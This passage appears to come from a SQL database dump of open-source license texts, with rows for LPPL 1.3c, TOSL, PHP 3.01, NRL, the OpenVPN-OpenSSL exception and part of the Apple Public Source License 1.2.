OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(258,'LPPL-1.3c','The LaTeX Project Public License\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\nLPPL Version 1.3c 2008-05-04\n\nCopyright 1999 2002-2008 LaTeX3 Project\n\nEveryone is allowed to distribute verbatim copies of this license document,\nbut modification of it is not allowed.\n\nPREAMBLE\n\n========\n\nThe LaTeX Project Public License (LPPL) is the primary license under which\nthe LaTeX kernel and the base LaTeX packages are distributed.\n\nYou may use this license for any work of which you hold the copyright and\nwhich you wish to distribute. This license may be particularly suitable if\nyour work is TeX-related (such as a LaTeX package), but it is written in such\na way that you can use it even if your work is unrelated to TeX.\n\nThe section `WHETHER AND HOW TO DISTRIBUTE WORKS UNDER THIS LICENSE\', below,\ngives instructions, examples, and recommendations for authors who are considering\ndistributing their works under this license.\n\nThis license gives conditions under which a work may be distributed and modified,\nas well as conditions under which modified versions of that work may be distributed.\n\nWe, the LaTeX3 Project, believe that the conditions below give you the freedom\nto make and distribute modified versions of your work that conform with whatever\ntechnical specifications you wish while maintaining the availability, integrity,\nand reliability of that work. If you do not see how to achieve your goal while\nmeeting these conditions, then read the document `cfgguide.tex\' and `modguide.tex\'\nin the base LaTeX distribution for suggestions.\n\nDEFINITIONS\n\n===========\n\nIn this license document the following terms are used:\n\n`Work\' Any work being distributed under this License. `Derived Work\' Any work\nthat under any applicable law is derived from the Work.\n\n`Modification\' Any procedure that produces a Derived Work under any applicable\nlaw -- for example, the production of a file containing an original file associated\nwith the Work or a significant portion of such a file, either verbatim or\nwith modifications and/or translated into another language.\n\n`Modify\' To apply any procedure that produces a Derived Work under any applicable\nlaw. `Distribution\' Making copies of the Work available from one person to\nanother, in whole or in part. Distribution includes (but is not limited to)\nmaking any electronic components of the Work accessible by file transfer protocols\nsuch as FTP or HTTP or by shared file systems such as Sun\'s Network File System\n(NFS).\n\n`Compiled Work\' A version of the Work that has been processed into a form\nwhere it is directly usable on a computer system. This processing may include\nusing installation facilities provided by the Work, transformations of the\nWork, copying of components of the Work, or other activities. Note that modification\nof any installation facilities provided by the Work constitutes modification\nof the Work.\n\n`Current Maintainer\' A person or persons nominated as such within the Work.\nIf there is no such explicit nomination then it is the `Copyright Holder\'\nunder any applicable law.\n\n`Base Interpreter\' A program or process that is normally needed for running\nor interpreting a part or the whole of the Work.\n\nA Base Interpreter may depend on external components but these are not considered\npart of the Base Interpreter provided that each external component clearly\nidentifies itself whenever it is used interactively. Unless explicitly specified\nwhen applying the license to the Work, the only applicable Base Interpreter\nis a `LaTeX-Format\' or in the case of files belonging to the `LaTeX-format\'\na program implementing the `TeX language\'.\n\nCONDITIONS ON DISTRIBUTION AND MODIFICATION\n\n===========================================\n\n1. Activities other than distribution and/or modification of the Work are\nnot covered by this license; they are outside its scope. In particular, the\nact of running the Work is not restricted and no requirements are made concerning\nany offers of support for the Work.\n\n2. You may distribute a complete, unmodified copy of the Work as you received\nit. Distribution of only part of the Work is considered modification of the\nWork, and no right to distribute such a Derived Work may be assumed under\nthe terms of this clause.\n\n3. You may distribute a Compiled Work that has been generated from a complete,\nunmodified copy of the Work as distributed under Clause 2 above, as long as\nthat Compiled Work is distributed in such a way that the recipients may install\nthe Compiled Work on their system exactly as it would have been installed\nif they generated a Compiled Work directly from the Work.\n\n4. If you are the Current Maintainer of the Work, you may, without restriction,\nmodify the Work, thus creating a Derived Work. You may also distribute the\nDerived Work without restriction, including Compiled Works generated from\nthe Derived Work. Derived Works distributed in this manner by the Current\nMaintainer are considered to be updated versions of the Work.\n\n5. If you are not the Current Maintainer of the Work, you may modify your\ncopy of the Work, thus creating a Derived Work based on the Work, and compile\nthis Derived Work, thus creating a Compiled Work based on the Derived Work.\n\n6. If you are not the Current Maintainer of the Work, you may distribute a\nDerived Work provided the following conditions are met for every component\nof the Work unless that component clearly states in the copyright notice that\nit is exempt from that condition. Only the Current Maintainer is allowed to\nadd such statements of exemption to a component of the Work.\n\na. If a component of this Derived Work can be a direct replacement for a component\nof the Work when that component is used with the Base Interpreter, then, wherever\nthis component of the Work identifies itself to the user when used interactively\nwith that Base Interpreter, the replacement component of this Derived Work\nclearly and unambiguously identifies itself as a modified version of this\ncomponent to the user when used interactively with that Base Interpreter.\n\nb. Every component of the Derived Work contains prominent notices detailing\nthe nature of the changes to that component, or a prominent reference to another\nfile that is distributed as part of the Derived Work and that contains a complete\nand accurate log of the changes.\n\nc. No information in the Derived Work implies that any persons, including\n(but not limited to) the authors of the original version of the Work, provide\nany support, including (but not limited to) the reporting and handling of\nerrors, to recipients of the Derived Work unless those persons have stated\nexplicitly that they do provide such support for the Derived Work.\n\n d. You distribute at least one of the following with the Derived Work:\n\n1. A complete, unmodified copy of the Work; if your distribution of a modified\ncomponent is made by offering access to copy the modified component from a\ndesignated place, then offering equivalent access to copy the Work from the\nsame or some similar place meets this condition, even though third parties\nare not compelled to copy the Work along with the modified component;\n\n2. Information that is sufficient to obtain a complete, unmodified copy of\nthe Work.\n\n7. If you are not the Current Maintainer of the Work, you may distribute a\nCompiled Work generated from a Derived Work, as long as the Derived Work is\ndistributed to all recipients of the Compiled Work, and as long as the conditions\nof Clause 6, above, are met with regard to the Derived Work.\n\n8. The conditions above are not intended to prohibit, and hence do not apply\nto, the modification, by any method, of any component so that it becomes identical\nto an updated version of that component of the Work as it is distributed by\nthe Current Maintainer under Clause 4, above.\n\n9. Distribution of the Work or any Derived Work in an alternative format,\nwhere the Work or that Derived Work (in whole or in part) is then produced\nby applying some process to that format, does not relax or nullify any sections\nof this license as they pertain to the results of applying that process.\n\n 10.\n\na. A Derived Work may be distributed under a different license provided that\nlicense itself honors the conditions listed in Clause 6 above, in regard to\nthe Work, though it does not have to honor the rest of the conditions in this\nlicense.\n\nb. If a Derived Work is distributed under a different license, that Derived\nWork must provide sufficient documentation as part of itself to allow each\nrecipient of that Derived Work to honor the restrictions in Clause 6 above,\nconcerning changes from the Work.\n\n11. This license places no restrictions on works that are unrelated to the\nWork, nor does this license place any restrictions on aggregating such works\nwith the Work by any means.\n\n12. Nothing in this license is intended to, or may be used to, prevent complete\ncompliance by all parties with all applicable laws.\n\nNO WARRANTY\n\n===========\n\nThere is no warranty for the Work. Except when otherwise stated in writing,\nthe Copyright Holder provides the Work `as is\', without warranty of any kind,\neither expressed or implied, including, but not limited to, the implied warranties\nof merchantability and fitness for a particular purpose. The entire risk as\nto the quality and performance of the Work is with you. Should the Work prove\ndefective, you assume the cost of all necessary servicing, repair, or correction.\n\nIn no event unless required by applicable law or agreed to in writing will\nThe Copyright Holder, or any author named in the components of the Work, or\nany other party who may distribute and/or modify the Work as permitted above,\nbe liable to you for damages, including any general, special, incidental or\nconsequential damages arising out of any use of the Work or out of inability\nto use the Work (including, but not limited to, loss of data, data being rendered\ninaccurate, or losses sustained by anyone as a result of any failure of the\nWork to operate with any other programs), even if the Copyright Holder or\nsaid author or said other party has been advised of the possibility of such\ndamages.\n\nMAINTENANCE OF THE WORK\n\n=======================\n\nThe Work has the status `author-maintained\' if the Copyright Holder explicitly\nand prominently states near the primary copyright notice in the Work that\nthe Work can only be maintained by the Copyright Holder or simply that it\nis `author-maintained\'.\n\nThe Work has the status `maintained\' if there is a Current Maintainer who\nhas indicated in the Work that they are willing to receive error reports for\nthe Work (for example, by supplying a valid e-mail address). It is not required\nfor the Current Maintainer to acknowledge or act upon these error reports.\n\nThe Work changes from status `maintained\' to `unmaintained\' if there is no\nCurrent Maintainer, or the person stated to be Current Maintainer of the work\ncannot be reached through the indicated means of communication for a period\nof six months, and there are no other significant signs of active maintenance.\n\nYou can become the Current Maintainer of the Work by agreement with any existing\nCurrent Maintainer to take over this role.\n\nIf the Work is unmaintained, you can become the Current Maintainer of the\nWork through the following steps:\n\n1. Make a reasonable attempt to trace the Current Maintainer (and the Copyright\nHolder, if the two differ) through the means of an Internet or similar search.\n\n2. If this search is successful, then enquire whether the Work is still maintained.\n\na. If it is being maintained, then ask the Current Maintainer to update their\ncommunication data within one month.\n\nb. If the search is unsuccessful or no action to resume active maintenance\nis taken by the Current Maintainer, then announce within the pertinent community\nyour intention to take over maintenance. (If the Work is a LaTeX work, this\ncould be done, for example, by posting to comp.text.tex.)\n\n3a. If the Current Maintainer is reachable and agrees to pass maintenance\nof the Work to you, then this takes effect immediately upon announcement.\n\nb. If the Current Maintainer is not reachable and the Copyright Holder agrees\nthat maintenance of the Work be passed to you, then this takes effect immediately\nupon announcement.\n\n4. If you make an `intention announcement\' as described in 2b. above and after\nthree months your intention is challenged neither by the Current Maintainer\nnor by the Copyright Holder nor by other people, then you may arrange for\nthe Work to be changed so as to name you as the (new) Current Maintainer.\n\n5. If the previously unreachable Current Maintainer becomes reachable once\nmore within three months of a change completed under the terms of 3b) or 4),\nthen that Current Maintainer must become or remain the Current Maintainer\nupon request provided they then update their communication data within one\nmonth.\n\nA change in the Current Maintainer does not, of itself, alter the fact that\nthe Work is distributed under the LPPL license.\n\nIf you become the Current Maintainer of the Work, you should immediately provide,\nwithin the Work, a prominent and unambiguous statement of your status as Current\nMaintainer. You should also announce your new status to the same pertinent\ncommunity as in 2b) above.\n\nWHETHER AND HOW TO DISTRIBUTE WORKS UNDER THIS LICENSE\n\n======================================================\n\nThis section contains important instructions, examples, and recommendations\nfor authors who are considering distributing their works under this license.\nThese authors are addressed as `you\' in this section.\n\nChoosing This License or Another License\n\n----------------------------------------\n\nIf for any part of your work you want or need to use *distribution* conditions\nthat differ significantly from those in this license, then do not refer to\nthis license anywhere in your work but, instead, distribute your work under\na different license. You may use the text of this license as a model for your\nown license, but your license should not refer to the LPPL or otherwise give\nthe impression that your work is distributed under the LPPL.\n\nThe document `modguide.tex\' in the base LaTeX distribution explains the motivation\nbehind the conditions of this license. It explains, for example, why distributing\nLaTeX under the GNU General Public License (GPL) was considered inappropriate.\nEven if your work is unrelated to LaTeX, the discussion in `modguide.tex\'\nmay still be relevant, and authors intending to distribute their works under\nany license are encouraged to read it.\n\nA Recommendation on Modification Without Distribution\n\n-----------------------------------------------------\n\nIt is wise never to modify a component of the Work, even for your own personal\nuse, without also meeting the above conditions for distributing the modified\ncomponent. While you might intend that such modifications will never be distributed,\noften this will happen by accident -- you may forget that you have modified\nthat component; or it may not occur to you when allowing others to access\nthe modified version that you are thus distributing it and violating the conditions\nof this license in ways that could have legal implications and, worse, cause\nproblems for the community. It is therefore usually in your best interest\nto keep your copy of the Work identical with the public one. Many works provide\nways to control the behavior of that work without altering any of its licensed\ncomponents.\n\nHow to Use This License\n\n-----------------------\n\nTo use this license, place in each of the components of your work both an\nexplicit copyright notice including your name and the year the work was authored\nand/or last substantially modified. Include also a statement that the distribution\nand/or modification of that component is constrained by the conditions in\nthis license.\n\nHere is an example of such a notice and statement:\n\n%% pig.dtx\n\n%% Copyright 2005 M. Y. Name\n\n%\n\n% This work may be distributed and/or modified under the\n\n% conditions of the LaTeX Project Public License, either version 1.3\n\n% of this license or (at your option) any later version.\n\n% The latest version of this license is in\n\n% http://www.latex-project.org/lppl.txt\n\n% and version 1.3 or later is part of all distributions of LaTeX\n\n% version 2005/12/01 or later.\n\n%\n\n% This work has the LPPL maintenance status \" maintained \".\n\n%\n\n% The Current Maintainer of this work is M. Y. Name .\n\n%\n\n% This work consists of the files pig.dtx and pig.ins\n\n% and the derived file pig.sty .\n\nGiven such a notice and statement in a file, the conditions given in this\nlicense document would apply, with the `Work\' referring to the three files\n`pig.dtx\', `pig.ins\', and `pig.sty\' (the last being generated from `pig.dtx\'\nusing `pig.ins\'), the `Base Interpreter\' referring to any `LaTeX-Format\',\nand both `Copyright Holder\' and `Current Maintainer\' referring to the person\n`M. Y. Name\'.\n\nIf you do not want the Maintenance section of LPPL to apply to your Work,\nchange `maintained\' above into `author-maintained\'. However, we recommend\nthat you use `maintained\', as the Maintenance section was added in order to\nensure that your Work remains useful to the community even when you can no\nlonger maintain and support it yourself.\n\nDerived Works That Are Not Replacements\n\n---------------------------------------\n\nSeveral clauses of the LPPL specify means to provide reliability and stability\nfor the user community. They therefore concern themselves with the case that\na Derived Work is intended to be used as a (compatible or incompatible) replacement\nof the original Work. If this is not the case (e.g., if a few lines of code\nare reused for a completely different task), then clauses 6b and 6d shall\nnot apply.\n\nImportant Recommendations\n\n-------------------------\n\nDefining What Constitutes the Work\n\nThe LPPL requires that distributions of the Work contain all the files of\nthe Work. It is therefore important that you provide a way for the licensee\nto determine which files constitute the Work. This could, for example, be\nachieved by explicitly listing all the files of the Work near the copyright\nnotice of each file or by using a line such as:\n\n% This work consists of all files listed in manifest.txt.\n\nin that place. In the absence of an unequivocal list it might be impossible\nfor the licensee to determine what is considered by you to comprise the Work\nand, in such a case, the licensee would be entitled to make reasonable conjectures\nas to which files comprise the Work.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(259,'TOSL','Trusster Open Source License version 1.0a (TRUST) copyright (c) 2006 Mike\nMintz and Robert Ekendahl. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Redistributions in any form must be accompanied by information on how to\nobtain complete source code for this software and any accompanying software\nthat uses this software. The source code must either be included in the distribution\nor be available in a timely fashion for no more than the cost of distribution\nplus a nominal fee, and must be freely redistributable under reasonable and\nno more restrictive conditions. For an executable file, complete source code\nmeans the source code for all modules it contains. It does not include source\ncode for modules or files that typically accompany the major components of\nthe operating system on which the executable file runs.\n\nTHIS SOFTWARE IS PROVIDED BY MIKE MINTZ AND ROBERT EKENDAHL ``AS IS\'\' AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT,\nARE DISCLAIMED. IN NO EVENT SHALL MIKE MINTZ AND ROBERT EKENDAHL OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(260,'openvpn-openssl-exception','Special exception for linking OpenVPN with OpenSSL:\n\nIn addition, as a special exception, OpenVPN Technologies, Inc. gives permission to link the code of this program with the OpenSSL Library (or with modified versions of OpenSSL that use the same license as OpenSSL), and distribute linked combinations including the two. You must obey the GNU General Public License in all respects for all of the code used other than OpenSSL. If you modify this file, you may extend this exception to your version of the file, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(261,'FSFUL','Copyright (C) 1992-1996, 1998-2012 Free Software Foundation, Inc.\n\nThis configure script is free software; the Free Software Foundation gives\nunlimited permission to copy, distribute and modify it.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(262,'PHP-3.01','The PHP License, version 3.01\n\nCopyright (c) 1999 - 2012 The PHP Group. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nis permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"PHP\" must not be used to endorse or promote products derived\nfrom this software without prior written permission. For written permission,\nplease contact group@php.net.\n\n4. Products derived from this software may not be called \"PHP\", nor may \"PHP\"\nappear in their name, without prior written permission from group@php.net.\nYou may indicate that your software works in conjunction with PHP by saying\n\"Foo for PHP\" instead of calling it \"PHP Foo\" or \"phpfoo\"\n\n5. The PHP Group may publish revised and/or new versions of the license from\ntime to time. Each version will be given a distinguishing version number.\nOnce covered code has been published under a particular version of the license,\nyou may always continue to use it under the terms of that version. You may\nalso choose to use such covered code under the terms of any subsequent version\nof the license published by the PHP Group. No one other than the PHP Group\nhas the right to modify the terms applicable to covered code created under\nthis License.\n\n6. Redistributions of any form whatsoever must retain the following acknowledgment:\n\"This product includes PHP software, freely available from <http://www.php.net/software/>\".\n\nTHIS SOFTWARE IS PROVIDED BY THE PHP DEVELOPMENT TEAM ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE PHP DEVELOPMENT TEAM OR ITS CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis software consists of voluntary contributions made by many individuals\non behalf of the PHP Group.\n\nThe PHP Group can be contacted via Email at group@php.net.\n\nFor more information on the PHP Group and the PHP project, please see <http://www.php.net>.\n\nPHP includes the Zend Engine, freely available at <http://www.zend.com>.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(263,'NRL','NRL License COPYRIGHT NOTICE\n\nAll of the documentation and software included in this software distribution\nfrom the US Naval Research Laboratory (NRL) are copyrighted by their respective\ndevelopers.\n\nPortions of the software are derived from the Net/2 and 4.4-Lite Berkeley\nSoftware Distributions (BSD) of the University of California at Berkeley and\nthose portions are copyright by The Regents of the University of California.\nAll Rights Reserved. The UC Berkeley Copyright and License agreement is binding\non those portions of the software. In all cases, the NRL developers have retained\nthe original UC Berkeley copyright and license notices in the respective files\nin accordance with the UC Berkeley copyrights and license.\n\nPortions of this software and documentation were developed at NRL by various\npeople. Those developers have each copyrighted the portions that they developed\nat NRL and have assigned All Rights for those portions to NRL. Outside the\nUSA, NRL has copyright on some of the software developed at NRL. The affected\nfiles all contain specific copyright notices and those notices must be retained\nin any derived work. NRL LICENSE\n\nNRL grants permission for redistribution and use in source and binary forms,\nwith or without modification, of the software and documentation created at\nNRL provided that the following conditions are met:\n\n 1. All terms of the UC Berkeley copyright and license must be followed.\n\n2. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n3. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n4. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgements:\n\n \n\nThis product includes software developed by the University of California,\nBerkeley and its contributors.\n\n \n\nThis product includes software developed at the Information Technology Division,\nUS Naval Research Laboratory.\n\n5. Neither the name of the NRL nor the names of its contributors may be used\nto endorse or promote products derived from this software without specific\nprior written permission.\n\nTHE SOFTWARE PROVIDED BY NRL IS PROVIDED BY NRL AND CONTRIBUTORS ``AS IS\'\'\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL NRL OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThe views and conclusions contained in the software and documentation are\nthose of the authors and should not be interpreted as representing official\npolicies, either expressed or implied, of the US Naval Research Laboratory\n(NRL).\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(264,'APSL-1.2','Apple Public Source License Ver. 1.2\n\n1. General; Definitions. This License applies to any program or other work\nwhich Apple Computer, Inc. (\"Apple\") makes publicly available and which contains\na notice placed by Apple identifying such program or work as \"Original Code\"\nand stating that it is subject to the terms of this Apple Public Source License\nversion 1.2 (or subsequent version thereof) (\"License\"). As used in this License:\n\n1.1 \"Applicable Patent Rights\" mean: (a) in the case where Apple is the grantor\nof rights, (i) claims of patents that are now or hereafter acquired, owned\nby or assigned to Apple and (ii) that cover subject matter contained in the\nOriginal Code, but only to the extent necessary to use, reproduce and/or distribute\nthe Original Code without infringement; and (b) in the case where You are\nthe grantor of rights, (i) claims of patents that are now or hereafter acquired,\nowned by or assigned to You and (ii) that cover subject matter in Your Modifications,\ntaken alone or in combination with Original Code.\n\n1.2 \"Contributor\" means any person or entity that creates or contributes to\nthe creation of Modifications.\n\n1.3 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.4 \"Deploy\" means to use, sublicense or distribute Covered Code other than\nfor Your internal research and development (R&D) and/or Personal Use, and\nincludes without limitation, any and all internal use or distribution of Covered\nCode within Your business or organization except for R&D use and/or Personal\nUse, as well as direct or indirect sublicensing or distribution of Covered\nCode by You to any third party in any form or manner.\n\n1.5 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.6 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of the Original Code, any previous Modifications,\nthe combination of Original Code and any previous Modifications, and/or any\nrespective portions thereof. When code is released as a series of files, a\nModification is: (a) any addition to or deletion from the contents of a file\ncontaining Covered Code; and/or (b) any new file or other representation of\ncomputer program statements that contains any part of Covered Code.\n\n1.7 \"Original Code\" means (a) the Source Code of a program or other work as\noriginally made available by Apple under this License, including the Source\nCode of any updates or upgrades to such programs or works made available by\nApple under this License, and that has been expressly identified by Apple\nas such in the header file(s) of such work; and (b) the object code compiled\nfrom such Source Code and originally made available by Apple under this License.\n\n1.8 \"Personal Use\" means use of Covered Code by an individual solely for his\nor her personal, private and non-commercial purposes. An individual\'s use\nof Covered Code in his or her capacity as an officer, employee, member, independent\ncontractor or agent of a corporation, business or organization (commercial\nor non-commercial) does not qualify as Personal Use.\n\n1.9 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.10 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions.Subject to the terms and conditions\nof this License, Apple hereby grants You, effective on the date You accept\nthis License and download the Original Code, a world-wide, royalty-free, non-exclusive\nlicense, to the extent of Apple\'s Applicable Patent Rights and copyrights\ncovering the Original Code, to do the following:\n\n2.1 You may use, reproduce, display, perform, modify and distribute Original\nCode, with or without Modifications, solely for Your internal research and\ndevelopment and/or Personal Use, provided that in each instance:\n\n(a) You must retain and reproduce in all copies of Original Code the copyright\nand other proprietary notices and disclaimers of Apple as they appear in the\nOriginal Code, and keep intact all notices in the Original Code that refer\nto this License; and\n\n(b) You must include a copy of this License with every copy of Source Code\nof Covered Code and documentation You distribute, and You may not offer or\nimpose any terms on such Source Code that alter or restrict this License or\nthe recipients\' rights hereunder, except as permitted under Section 6.\n\n2.2 You may use, reproduce, display, perform, modify and Deploy Covered Code,\nprovided that in each instance:\n\n(a) You must satisfy all the conditions of Section 2.1 with respect to the\nSource Code of the Covered Code;\n\n(b) You must duplicate, to the extent it does not already exist, the notice\nin Exhibit A in each file of the Source Code of all Your Modifications, and\ncause the modified files to carry prominent notices stating that You changed\nthe files and the date of any change;\n\n(c) You must make Source Code of all Your Deployed Modifications publicly\navailable under the terms of this License, including the license grants set\nforth in Section 3 below, for as long as you Deploy the Covered Code or twelve\n(12) months from the date of initial Deployment, whichever is longer. You\nshould preferably distribute the Source Code of Your Deployed Modifications\nelectronically (e.g. download from a web site); and\n\n(d) if You Deploy Covered Code in object code, executable form only, You must\ninclude a prominent notice, in the code itself as well as in related documentation,\nstating that Source Code of the Covered Code is available under the terms\nof this License with information on how and where to obtain such Source Code.\n\n2.3 You expressly acknowledge and agree that although Apple and each Contributor\ngrants the licenses to their respective portions of the Covered Code set forth\nherein, no assurances are provided by Apple or any Contributor that the Covered\nCode does not infringe the patent or other intellectual property rights of\nany other entity. Apple and each Contributor disclaim any liability to You\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, You hereby assume sole responsibility to secure\nany other intellectual property rights needed, if any. For example, if a third\nparty patent license is required to allow You to distribute the Covered Code,\nit is Your responsibility to acquire that license before distributing the\nCovered Code.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License:\n\n(a) You hereby grant to Apple and all third parties a non-exclusive, royalty-free\nlicense, under Your Applicable Patent Rights and other intellectual property\nrights (other than patent) owned or controlled by You, to use, reproduce,\ndisplay, perform, modify, distribute and Deploy Your Modifications of the\nsame scope and extent as Apple\'s licenses under Sections 2.1 and 2.2; and\n\n(b) You hereby grant to Apple and its subsidiaries a non-exclusive, worldwide,\nroyalty-free, perpetual and irrevocable license, under Your Applicable Patent\nRights and other intellectual property rights (other than patent) owned or\ncontrolled by You, to use, reproduce, display, perform, modify or have modified\n(for Apple and/or its subsidiaries), sublicense and distribute Your Modifications,\nin any form, through multiple tiers of distribution.\n\n4. Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In each such instance, You must make sure the requirements\nof this License are fulfilled for the Covered Code or any portion thereof.\n\n5. Limitations on Patent License. Except as expressly stated in Section 2,\nno other patent rights, express or implied, are granted by Apple herein. Modifications\nand/or Larger Works may require additional patent licenses from Apple which\nApple may grant in its sole discretion.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith the scope of the license granted herein (\"Additional Terms\") to one or\nmore recipients of Covered Code. However, You may do so only on Your own 